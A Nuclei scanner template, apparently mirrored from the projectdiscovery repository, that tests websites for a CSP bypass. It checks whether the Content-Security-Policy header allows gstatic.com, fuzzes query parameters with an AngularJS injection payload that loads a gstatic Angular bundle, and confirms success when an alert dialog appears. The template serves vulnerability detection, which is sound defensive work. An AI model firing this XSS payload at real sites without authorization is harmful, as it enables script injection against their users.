mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-18 16:43:42 +08:00
55 lines
1.4 KiB
YAML
55 lines
1.4 KiB
YAML
id: gstatic-angular-csp-bypass
|
|
|
|
info:
|
|
name: Content-Security-Policy Bypass - GStatic Angular
|
|
author: renniepak,DhiyaneshDK
|
|
severity: medium
|
|
reference:
|
|
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
|
|
metadata:
|
|
verified: true
|
|
tags: xss,csp-bypass,gstatic-angular
|
|
|
|
flow: http(1) && headless(1)
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "Content-Security-Policy"
|
|
- "gstatic.com"
|
|
condition: and
|
|
internal: true
|
|
|
|
headless:
|
|
- steps:
|
|
- action: navigate
|
|
args:
|
|
url: "{{BaseURL}}"
|
|
|
|
- action: waitdialog
|
|
name: gstatic_angular_csp_xss
|
|
args:
|
|
max-duration: 5s
|
|
|
|
payloads:
|
|
injection:
|
|
- <body ng-app ng-csp><script src="//www.gstatic.com/fsn/angular_js-bundle1.js"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>
|
|
|
|
fuzzing:
|
|
- part: query
|
|
type: replace
|
|
mode: single
|
|
fuzz:
|
|
- "{{url_encode(injection)}}"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "gstatic_angular_csp_xss == true"
|
|
# digest: 4b0a00483046022100fd582b9afcf492fb21cb3b5933624dc5b8a3d6b47bfcc43967f810258efbe3310221008ee73c6053f0e9ddfbff6aceb9eb7d3c05b0d7ca49f97de5a65a7cfb5ce965fd:922c64590222798bb761d5b6d8e72950 |